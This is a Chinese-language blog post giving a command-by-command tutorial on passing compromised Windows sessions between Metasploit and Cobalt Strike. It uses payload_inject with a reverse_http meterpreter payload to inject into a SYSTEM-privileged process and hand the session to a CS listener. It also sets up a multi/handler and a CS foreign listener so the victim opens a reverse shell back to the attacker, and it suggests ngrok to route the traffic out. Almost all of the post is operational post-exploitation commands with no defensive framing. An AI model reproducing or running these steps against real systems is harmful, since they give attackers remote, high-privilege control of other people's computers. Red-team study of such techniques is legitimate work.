CYH博客CYH博客

天行健,
君子以自强不息。

MSF与CS互传sessions会话

Msf派生一个shell传给cs:

首先,msf获得一个meterpreter会话。

注意:meterpreter会话需要system权限,才可注入到其他进程。

用background把会话挂到后台,选用其他exploit用于传递会话。

派生一个新的shell给cs,那么msf里面用到的exploit:

exploit/windows/local/payload_inject

操作:

use exploit/windows/local/payload_inject(选用exploit)

set payload windows/x64/meterpreter/reverse_http(选用的payload一定要跟cs下监听的payload方式一样)

set DisablePayloadHandler true(禁止产生一个新的handler)

set LHOST IP(ip为cs监听会话用的ip)

set LPORT 端口(端口为cs对应的接受反弹shell的端口)

set pid 进程号(设置派生给cs后木马进程的pid进程号,如果有system权限则可以指定一个具有system权限的进程,这样cs接收到会话也是最高权限)

set session 1(设置需要派送的meterpreter)

exploit(开始执行)

执行之后即可得到一个cs的会话。

CS下的会话传给MSF:

首先在msf上监听自己的ip跟端口:

use exploit/multi/handler

set payload windows/meterpreter/reverse_http(跟cs上选用的payload一样)

set lhost 本机ip

set lport 接受的端口

exploit 执行

然后cs那边创建一个foreign监听的listeners。

Listeners的ip为msf的ip,端口为msf监听的端口(注:如果msf是内网下的,则需要把端口映射到公网,或者使用ngrok等工具做流量转发)

然后,回到cs上,选中拿下的计算机会话,右键选中spawn,然后在弹出来的框中

选择刚刚创建的listeners监听器,然后执行。

此时,msf下即可看到已经拿到了一个新的会话。

值得注意的是,cs派送给msf的时候尽量选择tcp的payload去派送。

注意:前期利用的payload载荷一定要跟目标系统的系统位数一致,否则后面传递会话的时候会出现问题。


未经允许不得转载:CYH博客 » MSF与CS互传sessions会话
分享到: 更多 (0)

CYH博客 带给你想要内容

联系我们